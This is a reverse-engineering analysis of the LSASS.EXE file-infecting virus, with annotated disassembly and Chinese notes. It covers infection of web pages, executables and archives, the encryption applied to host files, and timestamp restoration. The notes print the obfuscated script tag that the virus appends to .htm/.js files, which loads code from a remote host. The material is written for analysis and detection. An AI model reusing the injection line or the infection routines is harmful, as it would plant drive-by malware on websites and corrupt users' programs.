; Visible behaviour: read the whole file line by line into a CString; if
; CString::Find(marker) == -1, open the file through the object at this+1B8,
; seek to end, write the marker, close, and bump the global counter at 40F408.
; Defender note: the only on-disk change is the marker appended at EOF, so a
; scan/cleanup rule can key on that exact line at the end of the file.
; ---------------------------------------------------------------------------
00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; web file infect function; EAX = unwind handler for _EH_prolog
00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog> ; frame + SEH registration ([EBP-4] = EH state)
00402BA1 |. 81EC 60040000 SUB ESP,460 ; locals (line buffer at EBP-46C takes 0x400 of it)
00402BA7 |. 53 PUSH EBX ; save callee-saved regs
00402BA8 |. 56 PUSH ESI
00402BA9 |. 8BF1 MOV ESI,ECX ; ESI = this
00402BAB |. 6A 01 PUSH 1
00402BAD |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] ; ECX = &accumulator CString
00402BB0 |. 5B POP EBX ; EBX = 1 for the rest of the routine
00402BB1 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX ; EH state = 1 (accumulator live)
00402BB4 |. E8 4F590000 CALL <JMP.&MFC42.#540_??0CString@@QAE@X> ; CString::CString() -> [EBP-10] = ""
00402BB9 |. A1 18A34000 MOV EAX,DWORD PTR DS:[<&MSVCIRT.?openpr> ; &filebuf::openprot
00402BBE |. 53 PUSH EBX ; extra ctor arg (ios is a virtual base; presumably the "most derived" flag)
00402BBF |. 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C] ; ECX = &ifstream object
00402BC2 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402BC6 |. FF30 PUSH DWORD PTR DS:[EAX] ; prot = openprot
00402BC8 |. 53 PUSH EBX ; mode = 1 (ios::in in the old iostream)
00402BC9 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; path (arg 1)
00402BCC |. FF15 14A34000 CALL DWORD PTR DS:[<&MSVCIRT.??0ifstrea>; MSVCIRT.??0ifstream@@QAE@PBDHH@Z ; ifstream(path, mode, prot)
00402BD2 |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00402BD5 |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3 ; EH state = 3 (ifstream live)
00402BD9 |. 85C0 TEST EAX,EAX ; compiler-emitted null check before the vbtable walk
00402BDB |. 74 0A JE SHORT LSASS.00402BE7
00402BDD |. 8B45 94 MOV EAX,DWORD PTR SS:[EBP-6C] ; EAX = vbptr
00402BE0 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4] ; offset of the ios virtual base
00402BE3 |. 8D4405 94 LEA EAX,DWORD PTR SS:[EBP+EAX-6C] ; EAX = &ios subobject
00402BE7 |> F640 08 06 TEST BYTE PTR DS:[EAX+8],6 ; ios state & (failbit|badbit)
00402BEB |. 0F85 A4000000 JNZ LSASS.00402C95 ; open failed -> cleanup, file untouched
00402BF1 |. 85C0 TEST EAX,EAX
00402BF3 |. 0F84 9C000000 JE LSASS.00402C95
00402BF9 |. 68 10F44000 PUSH LSASS.0040F410 ; global string buffer (contents at this point not established in this listing)
00402BFE |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C01 |. E8 165A0000 CALL <JMP.&MFC42.#860_??4CString@@QAEAB> ; accumulator = (const char*)40F410
00402C06 |> 8B45 94 /MOV EAX,DWORD PTR SS:[EBP-6C] ; --- read loop: runs until eofbit is set ---
00402C09 |. 8B40 04 |MOV EAX,DWORD PTR DS:[EAX+4] ; vbase offset again
00402C0C |. 845C05 9C |TEST BYTE PTR SS:[EBP+EAX-64],BL ; ios state & 1 (eofbit) ; same byte as [ios+8]
00402C10 |. 75 28 |JNZ SHORT LSASS.00402C3A ; EOF -> stop reading
00402C12 |. 6A 0A |PUSH 0A ; delim = '\n'
00402C14 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C] ; line buffer
00402C1A |. 68 00040000 |PUSH 400 ; max 0x400 bytes per line
00402C1F |. 50 |PUSH EAX
00402C20 |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
00402C23 |. FF15 10A34000 |CALL DWORD PTR DS:[<&MSVCIRT.?getline@>; MSVCIRT.?getline@istream@@QAEAAV1@PAEHD@Z ; NOTE(review): only eofbit ends the loop; a line over 0x400 bytes would set failbit and presumably never reach EOF - confirm
00402C29 |. 8D85 94FBFFFF |LEA EAX,DWORD PTR SS:[EBP-46C]
00402C2F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402C32 |. 50 |PUSH EAX
00402C33 |. E8 0E5A0000 |CALL <JMP.&MFC42.#941_??YCString@@QAEA> ; accumulator += line (delimiter stripped by getline)
00402C38 |.^ EB CC /JMP SHORT LSASS.00402C06
00402C3A |> 8D4D 94 LEA ECX,DWORD PTR SS:[EBP-6C]
00402C3D |. FF15 0CA34000 CALL DWORD PTR DS:[<&MSVCIRT.?close@ifs>; MSVCIRT.?close@ofstream@@QAEXXZ ; ifstream::close (OllyDbg's "ofstream" label is its own mis-annotation)
00402C43 |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; marker string (arg 2)
00402C46 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402C49 |. E8 C2590000 CALL <JMP.&MFC42.#2764_?Find@CString@@Q> ; accumulator.Find(marker)
00402C4E |. 83F8 FF CMP EAX,-1
00402C51 |. 75 42 JNZ SHORT LSASS.00402C95 ; marker already present -> leave file alone
00402C53 |. 8B86 B8010000 MOV EAX,DWORD PTR DS:[ESI+1B8] ; vtable of the file object at this+1B8
00402C59 |. 81C6 B8010000 ADD ESI,1B8 ; ESI = &file object from here on
00402C5F |. 6A 00 PUSH 0 ; 3rd arg = 0 (pError, if this is CFile::Open)
00402C61 |. 53 PUSH EBX ; 2nd arg = 1 (CFile::modeWrite if CFile - inferred from the slot use)
00402C62 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; path
00402C65 |. 8BCE MOV ECX,ESI
00402C67 |. FF50 28 CALL DWORD PTR DS:[EAX+28] ; openfile ; vtable slot +28 (Open - original annotation)
00402C6A |. 85C0 TEST EAX,EAX
00402C6C |. 74 27 JE SHORT LSASS.00402C95 ; open failed -> cleanup
00402C6E |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C70 |. 6A 02 PUSH 2 ; from = end
00402C72 |. 6A 00 PUSH 0 ; offset 0
00402C74 |. 8BCE MOV ECX,ESI
00402C76 |. FF50 30 CALL DWORD PTR DS:[EAX+30] ; seekfile ; slot +30: Seek(0, end) -> append position
00402C79 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] ; EAX = marker buffer (CString data pointer)
00402C7C |. 8B16 MOV EDX,DWORD PTR DS:[ESI]
00402C7E |. 8B48 F8 MOV ECX,DWORD PTR DS:[EAX-8] ; MFC42 CString keeps nDataLength at data-8
00402C81 |. 51 PUSH ECX ; nCount = strlen(marker)
00402C82 |. 50 PUSH EAX ; lpBuf = marker
00402C83 |. 8BCE MOV ECX,ESI
00402C85 |. FF52 40 CALL DWORD PTR DS:[EDX+40] ; writefile ; slot +40: Write(marker, len) at EOF
00402C88 |. 8B06 MOV EAX,DWORD PTR DS:[ESI]
00402C8A |. 8BCE MOV ECX,ESI
00402C8C |. FF50 54 CALL DWORD PTR DS:[EAX+54] ; close ; slot +54: Close
00402C8F |. FF05 08F44000 INC DWORD PTR DS:[40F408] ; global counter of files modified (read back by the walker at 00402810)
00402C95 |> 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60] ; --- cleanup / unwind path ---
00402C98 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00402C9C |. FF15 08A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ifstrea>; MSVCIRT.??1ifstream@@UAE@XZ ; ~ifstream (also closes if still open)
00402CA2 |. 8D4D A0 LEA ECX,DWORD PTR SS:[EBP-60]
00402CA5 |. FF15 04A34000 CALL DWORD PTR DS:[<&MSVCIRT.??1ios@@UA>; MSVCIRT.??1ios@@UAE@XZ ; ~ios (virtual base)
00402CAB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00402CAE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
00402CB1 |. E8 46580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; ~accumulator
00402CB6 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
00402CBA |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
00402CBD |. E8 3A580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; callee destroys by-value arg 1 (path)
00402CC2 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
00402CC6 |. 8D4D 0C LEA ECX,DWORD PTR SS:[EBP+C]
00402CC9 |. E8 2E580000 CALL <JMP.&MFC42.#800_??1CString@@QAE@X> ; callee destroys by-value arg 2 (marker)
00402CCE |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] ; saved SEH chain head
00402CD1 |. 5E POP ESI
00402CD2 |. 5B POP EBX
00402CD3 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX ; unregister the exception frame
00402CDA |. C9 LEAVE
00402CDB /. C2 0800 RETN 8 ; pops the two 4-byte CString args
感染文件类型:(文件全名后三位)
1 .htm, tml, .js
2 .exe
3 .rar, .zip
web文件感染函数:
1 按行读取web文件内容
2 如果没有找到匹配的:document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部加上这一句。
exe文件感染函数:
被感染的文件包括三个部分:
1)被修改图标资源的病毒体
2)被加密的原文件
3)病毒体
1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息。
2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存,并修改相应的资源内容,然后写到com/~临时文件中。
3 取待感染文件信息(后面修改文件时间用)。
4 读取待感染文件内容到内存,并进行加密,然后追加到com/~临时文件中。
5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存,并加密写到com/~临时文件中。
6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置。
//Add on 22:57 2008-1-9
对EXE的加密算法:
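dwStart = 21B                       /* [40D030]: 0x21B; pass 1 starts at 0x21B + 9 = 0x224 (see 00406526) */
g_dwVFileSize                       /* [40D03C]: size of the virus body; also the read-buffer size and the loop bound */
g_dwNeedFilePos                     /* [ESI+170]: heap buffer the host file is read into */
bInfect = TRUE;                     /* [EBP-D]: only the FIRST chunk is transformed */
/* The host file is read in chunks of g_dwVFileSize bytes.  Only the first
 * chunk goes through the two NOT passes; every chunk, transformed or not,
 * is then written to the temporary file (fwrite at 00406585).  Because NOT
 * is its own inverse, an analyst recovers the original host by re-applying
 * the same two passes to the first chunk of the appended payload.
 * Net effect of the two passes: 11 is odd, so every other byte touched by
 * pass 1 (offsets 0x224, 0x23A, ...) is even and gets NOT-ed a second time
 * by pass 2, i.e. restored.  Bytes actually changed are: all even offsets
 * except 0x224 + 22k, plus the odd offsets 0x22F + 22k.
 */
while ((n = fread(g_dwNeedFilePos/*pBuf*/, 1, g_dwVFileSize, file)) != 0)
{
    /* 0040651A: flag clear -> skip straight to the fwrite, NOT a loop exit */
    if (bInfect)
    {
        /* pass 1: NOT every 11th byte starting at dwStart + 9 */
        ECX = dwStart;
        ECX += 0x09;
        while (1)
        {
            dwTmp = ECX;
            if (ECX >= g_dwVFileSize)   /* JNB at 00406532 is unsigned >=: ECX == size also stops */
                break;
            EDX = g_dwNeedFilePos;
            ECX += EDX;
            byte tmp = Get [ECX];
            not tmp;
            Set [ECX], tmp;
            ECX = dwTmp;
            ECX += 0x0B;
        }
        /* pass 2: NOT every even offset 0, 2, 4, ... below g_dwVFileSize */
        ECX = 0;
        dwTmp = ECX;
        if (g_dwVFileSize <= ECX)       /* JBE at 00406555 */
            goto aa;
        do
        {
            EDX = g_dwNeedFilePos;
            ECX += EDX;
            byte tmp = Get [ECX];
            not tmp;
            Set [ECX], tmp;
            ECX = dwTmp;
            ECX += 2;
            dwTmp = ECX;
            if (ECX >= g_dwVFileSize)   /* JB at 00406573 loops while ECX < size */
                break;
        } while (1);
aa:
        bInfect = FALSE;
    }
    /* Both passes are bounded by g_dwVFileSize, not by n, so on a short
     * (final or only) chunk the tail of the buffer is NOT-ed too; it is
     * harmless because only the n bytes actually read are written out. */
    fwrite(g_dwNeedFilePos, 1, n, tmpfile /* com/~ */);
}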
//Add end 22:57 2008-1-9
具体分析见如下代码及注释:
/
1 遍历文件函数
00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]
00402206 |. 50 PUSH EAX ; /pFindFileData
00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName
0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA
00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE
00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |
00402215 |. 53 PUSH EBX ; |MsgFilterMax
00402216 |. 53 PUSH EBX ; |MsgFilterMin
00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |
0040221D |. 53 PUSH EBX ; |hWnd
0040221E |. 50 PUSH EAX ; |pMsg
0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA
00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1
00402229 |. 0F84 BC080000 JE LSASS.00402AEB
0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"
00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]
0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."
0040223F |. 50 |PUSH EAX ; |s1
00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402245 |. 59 |POP ECX
00402246 |. 85C0 |TEST EAX,EAX
00402248 |. 59 |POP ECX
00402249 |. 0F84 7B080000 |JE LSASS.00402ACA
0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."
0040225A |. 50 |PUSH EAX ; |s1
0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402260 |. 59 |POP ECX
00402261 |. 85C0 |TEST EAX,EAX
00402263 |. 59 |POP ECX
00402264 |. 0F84 60080000 |JE LSASS.00402ACA
0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10
00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
...
004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA
004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"
004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023B9 |. 59 |POP ECX
004023BA |. 85C0 |TEST EAX,EAX
004023BC |. 59 |POP ECX
004023BD |. 0F84 9E060000 |JE LSASS.00402A61
004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"
004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023CF |. 59 |POP ECX
004023D0 |. 85C0 |TEST EAX,EAX
004023D2 |. 59 |POP ECX
004023D3 |. 0F84 88060000 |JE LSASS.00402A61
004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"
004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023E7 |. 59 |POP ECX
004023E8 |. 85C0 |TEST EAX,EAX
004023EA |. 59 |POP ECX
004023EB |. 75 6D |JNZ SHORT LSASS.0040245A
004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect
004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA
004023FD |. 51 |PUSH ECX
004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]
00402404 |. 8BCC |MOV ECX,ESP
00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402409 |. 50 |PUSH EAX
0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
00402412 |. 68 08D14000 |PUSH LSASS.0040D108
00402417 |. 50 |PUSH EAX
00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]
0040241E |. 50 |PUSH EAX
0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11
00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402428 |. 51 |PUSH ECX
00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040242F |. 8BCC |MOV ECX,ESP
00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
00402434 |. 52 |PUSH EDX
00402435 |. 50 |PUSH EAX
00402436 |. 51 |PUSH ECX
00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12
0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402440 |. 8BCE |MOV ECX,ESI
00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13
00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function
0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]
00402455 |. E9 6B060000 |JMP LSASS.00402AC5
0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"
0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402468 |. 59 |POP ECX
00402469 |. 85C0 |TEST EAX,EAX
0040246B |. 59 |POP ECX
0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect
00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"
0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]
004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL
004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"
004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]
004024C9 |. 57 |PUSH EDI
004024CA |. 50 |PUSH EAX
004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]
004024D6 |. 50 |PUSH EAX
004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14
004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]
004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
004024F5 |. 50 |PUSH EAX
004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
004024F9 |. 50 |PUSH EAX
004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]
00402500 |. 50 |PUSH EAX
00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]
0040250C |. 50 |PUSH EAX
0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15
00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]
0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402525 |. 8BCE |MOV ECX,ESI
00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function
0040252C |. 84C0 |TEST AL,AL
0040252E |. 74 04 |JE SHORT LSASS.00402534
00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1
00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL
0040253A |. 0F84 8C000000 |JE LSASS.004025CC
00402540 |. 53 |PUSH EBX
00402541 |. 51 |PUSH ECX
00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
00402548 |. 8BC4 |MOV EAX,ESP
0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
0040254D |. 51 |PUSH ECX
0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402551 |. 51 |PUSH ECX
00402552 |. 50 |PUSH EAX
00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes
0040255D |. 59 |POP ECX
0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]
00402564 |. 8BCC |MOV ECX,ESP
00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402569 |. 50 |PUSH EAX
0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040256F |. 51 |PUSH ECX
00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]
00402576 |. 8BCC |MOV ECX,ESP
00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
0040257B |. 50 |PUSH EAX
0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16
00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402585 |. 8BCE |MOV ECX,ESI
00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path
00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]
00402596 |. 53 |PUSH EBX ; /hTemplateFile
00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
0040259E |. 53 |PUSH EBX ; |pSecurity
0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004025A6 |. 50 |PUSH EAX ; |FileName
004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
004025B3 |. 51 |PUSH ECX ; /pLastWrite
004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004025B7 |. 51 |PUSH ECX ; |pLastAccess
004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004025BB |. 51 |PUSH ECX ; |pCreationTime
004025BC |. 50 |PUSH EAX ; |hFile
004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject
004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path
004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink
004025D8 |. 59 |POP ECX
004025D9 |. E9 EC040000 |JMP LSASS.00402ACA
004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"
004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004025EC |. 59 |POP ECX
004025ED |. 85C0 |TEST EAX,EAX
004025EF |. 59 |POP ECX
004025F0 |. 74 18 |JE SHORT LSASS.0040260A
004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"
004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402600 |. 59 |POP ECX
00402601 |. 85C0 |TEST EAX,EAX
00402603 |. 59 |POP ECX
00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA
0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]
00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"
00402615 |. 50 |PUSH EAX ; |s1
00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp
0040261C |. 59 |POP ECX
0040261D |. 85C0 |TEST EAX,EAX
0040261F |. 59 |POP ECX
00402620 |. 0F84 A4040000 |JE LSASS.00402ACA
00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect
0040262C |. 0F8F 98040000 |JG LSASS.00402ACA
00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000
0040263C |. 0F87 88040000 |JA LSASS.00402ACA
00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402648 |. 50 |PUSH EAX
00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
0040264C |. 50 |PUSH EAX
0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]
00402653 |. 50 |PUSH EAX
00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402659 |. 50 |PUSH EAX
0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]
0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17
00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]
0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]
00402680 |. 57 |PUSH EDI
00402681 |. 50 |PUSH EAX
00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
00402691 |. 51 |PUSH ECX
00402692 |. 50 |PUSH EAX
00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]
00402699 |. 50 |PUSH EAX
